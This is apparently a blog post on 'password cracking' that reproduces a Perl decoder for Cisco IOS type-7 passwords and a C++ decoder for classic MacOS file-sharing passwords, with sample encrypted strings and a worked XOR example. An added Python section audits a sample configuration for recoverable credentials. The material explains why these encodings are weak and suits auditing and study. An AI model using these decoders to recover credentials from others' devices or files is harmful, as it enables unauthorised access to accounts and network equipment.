Monday 23 July 2018

More Password Cracking Decrypted part 3

Cracking the CISCO IOS Password


The following Perl script demonstrates how to decrypt Cisco IOS passwords stored in a configuration as "password 7 <hex>" or "md5 7 <hex>" entries.

_____________________________




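#!/usr/bin/perl -w
# $Id: ios7decrypt.pl,v 1.1 1998/01/11 21:31:12 mesrik Exp $
#
# Credits for original code and description hobbit@avian.org,
# SPHiXe, .mudge et al. and for John Bashinski <jbash@CISCO.COM>
# for Cisco IOS password encryption facts.
#
# Use for any malice or illegal purposes strictly prohibited!
#

# Fixed XOR key table (26 bytes as listed here)
@xlat = ( 0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41,
          0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c,
          0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53, 0x55, 0x42 );

# Read configuration lines from the files named on the command line, or from stdin
while (<>) {
    # Match "password 7 <hex>" or "md5 7 <hex>"
    if (/(password|md5)\s+7\s+([\da-f]+)/io) {
        # Only handle strings with an even number of hex digits
        if (!(length($2) & 1)) {
            $ep = $2; $dp = "";
            # First two digits: starting index into @xlat; the rest: encoded bytes
            ($s, $e) = ($2 =~ /^(..)(.+)/o);
            for ($i = 0; $i < length($e); $i+=2) {
                # XOR each encoded byte with the next key byte
                $dp .= sprintf "%c",hex(substr($e,$i,2))^$xlat[$s++];
            }
            # Replace the encoded string with the decoded password in the line
            s/$ep/$dp/;
        }
    }
    print;
}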

_____________________
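
An added example, not part of the original post or of ios7decrypt.pl: a Python audit pass that lists every "password 7" / "md5 7" string in a configuration and decodes it with the same 26-byte table, reporting (rather than mis-decoding) entries that are malformed or whose key index runs past that table. The function names, the finding fields and the sample configuration are constructed for illustration.

```python
import re

# Key table exactly as listed in the Perl script above (26 bytes).
XLAT = bytes([0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41,
              0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c,
              0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53, 0x55, 0x42])

# Same match as the script: "password 7 <hex>" or "md5 7 <hex>".
TYPE7 = re.compile(r"(password|md5)\s+7\s+([0-9a-f]+)", re.I)


def decode_type7(enc):
    """Return (status, text) for one encoded string."""
    if len(enc) < 4 or len(enc) % 2:
        return "malformed", None          # need 2 index digits plus >= 1 byte
    if not enc[:2].isdigit():
        return "malformed", None          # the script uses these as a decimal index
    start = int(enc[:2])
    data = bytes.fromhex(enc[2:])
    if start + len(data) > len(XLAT):
        return "offset-past-table", None  # the Perl loop would read undef here
    text = bytes(b ^ XLAT[start + i] for i, b in enumerate(data))
    return "recovered", text.decode("latin-1")


def audit(config_text):
    """List every matching entry with its line number and decode status."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        m = TYPE7.search(line)
        if m:
            status, text = decode_type7(m.group(2))
            findings.append({"line": lineno, "keyword": m.group(1).lower(),
                             "status": status, "text": text})
    return findings


# Constructed sample configuration (not taken from a real device).
SAMPLE = """\
hostname lab-rtr
enable password 7 02050D480809
username ops password 7 2421270013
line vty 0 4
 password 7 0205A
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Every "recovered" finding is a credential that anyone with read access to the configuration file can read back.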



Cracking the MacOS Password


The following piece of code demonstrates how the algorithm used by MacOS to encrypt passwords works, and also how to decrypt such passwords. So enjoy!



/*
 macfspwd.c
 Written by Nate Pierce
 luphus@iastate.edu
 http://happiness.dhs.org
 July 14, 1999

 Algorithm taken from:
 http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=519
 I have tested this on 8.6 and it works fine as well.

 Compiled quite peachily on linux 2.2.10 with:
 g++ -o macfspwd macfspwd.c

 Run example (with debug on):

 [user@server user]$ ./macfspwd 000406180D0A190B
 Original string: 00 04 06 18 0d 0a 19 0b
 1st XOR string:  00 00 04 06 18 0d 0a 19
 2nd XOR string:  73 70 63 67 74 70 72 6b
 Password is: stayaway

 ----- from the url above -----
 The encryption algorithm in MacOS system is simple and the password can be easily
 decoded.

 Password is stored in Users & Groups Data File in Preferences folder. Offset is different on
 each system and depends on Users & Groups configuration, but it always lies after owner's
 username. It's not so difficult to find it using a hex editor, even if we don't know owner's
 username.

 Here are some examples of encrypted passwords:
 00 04 06 18 0D 0A 19 0B = stayaway
 0A 1F 10 1B 00 07 75 1E = yellow
 1C 1B 16 14 12 62 10 7B = owner
 07 02 13 1A 1E 0F 1A 14 = turnpage
 27 25 33 27 27 39 24 7E = Trustno1

 AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh

 where:
 AA BB CC DD EE FF GG HH - encrypted password (hex)
 aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)

 aa=AA XOR 73H
 bb=BB XOR AA XOR 70H
 cc=CC XOR BB XOR 63H
 dd=DD XOR CC XOR 67H
 ee=EE XOR DD XOR 74H
 ff=FF XOR EE XOR 70H
 gg=GG XOR FF XOR 72H
 hh=HH XOR GG XOR 6BH

 An example:
 Let's take 00 04 06 18 0D 0A 19 0B

 00H XOR 73H = 73H = s
 04H XOR 00H = 04H; 04H XOR 70H = 74H = t
 06H XOR 04H = 02H; 02H XOR 63H = 61H = a
 18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
 0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
 0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
 19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
 0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y

 tested on:
 MacOS 7.5.3, 7.5.5, 8.1, 8.5.

 copied verbatim from a post to bugtraq by Dawid adix Adamski <adixx@FRIKO4.ONET.PL> on
 July 10, 1999
 ----- snip -----
*/



#include <iostream>
#include <iomanip>
#include <cstring>

using namespace std;

/* comment this out if don't want to see the extra info */
#define DEBUG

/* I think the max password length for file sharing is 8 characters */
#define PWLEN 8

int hexdig(char q);
/* returns the ASCII offset to subtract from q if q is 0-9, A-F, or a-f; 0 if q is not a hex digit */

int hexint(char p,char q);
/* returns value of 2 hex digits spliced together - hexint('F','F') will return 255 */

int main(int argc, char *argv[]){
  int s1[PWLEN],s2[PWLEN],s3[PWLEN],i;
  char pwd[PWLEN+1];

/* first string - try 000406180D0A190B */
/* require exactly 2*PWLEN digits so s1 is fully initialised and never overrun */
  if(argc<2 || strlen(argv[argc-1])!=2u*PWLEN){
    cout<<"\nError: last argument should be a 16 digit hex number! (no spaces please)\n";
    return 1;
  }
  for(i=0;i<2*PWLEN;i+=2){
    if(hexdig(argv[argc-1][i])&&hexdig(argv[argc-1][i+1]))s1[i/2]=hexint(argv[argc-1][i],argv[argc-1][i+1]);
    else{
      cout<<"\nError: last argument should be a 16 digit hex number! (no spaces please)\n";
      return 1;
    }
  }

/* chunk in 2nd XOR string - based on the string from the file*/
/* (the encrypted bytes shifted right by one position, with 00 in front) */
  s2[0]=0x0;
  for(i=0;i<PWLEN-1;i++){
    s2[i+1]=s1[i];
  }

/* chunk in final XOR string - this is constant */
  s3[0]=0x73;
  s3[1]=0x70;
  s3[2]=0x63;
  s3[3]=0x67;
  s3[4]=0x74;
  s3[5]=0x70;
  s3[6]=0x72;
  s3[7]=0x6B;

#ifdef DEBUG
  cout<<"Original string: ";
  for(i=0;i<PWLEN;i++){
    if(s1[i]<0x10)cout<<"0";
    cout<<hex<<s1[i]<<" ";
  }
  cout<<"\n1st XOR string:  ";
  cout<<"00 ";
  for(i=0;i<PWLEN-1;i++){
    if(s2[i+1]<0x10)cout<<"0";
    cout<<hex<<s2[i+1]<<" ";
  }
  cout<<"\n2nd XOR string:  ";
  for(i=0;i<PWLEN;i++){
    if(s3[i]<0x10)cout<<"0";
    cout<<hex<<s3[i]<<" ";
  }
  cout<<endl;
#endif

/* each password byte = encrypted byte XOR previous encrypted byte XOR constant */
  cout<<"Password is: ";
  for(i=0;i<PWLEN;i++)pwd[i]=s1[i]^s2[i]^s3[i];
  pwd[PWLEN]=0x0;
  cout<<pwd<<endl;

  return 0;
}

int hexdig(char q){
  if(q>47 && q<58)return 48;   /* '0'-'9' */
  if(q>64 && q<71)return 55;   /* 'A'-'F' */
  if(q>96 && q<103)return 87;  /* 'a'-'f' */
  return 0;
}

int hexint(char p,char q){
  return 16*(p-hexdig(p))+(q-hexdig(q));
}



Thanks for reading this third cracking post. If you have not read the previous two, please visit these two links to read them.
Thank you.

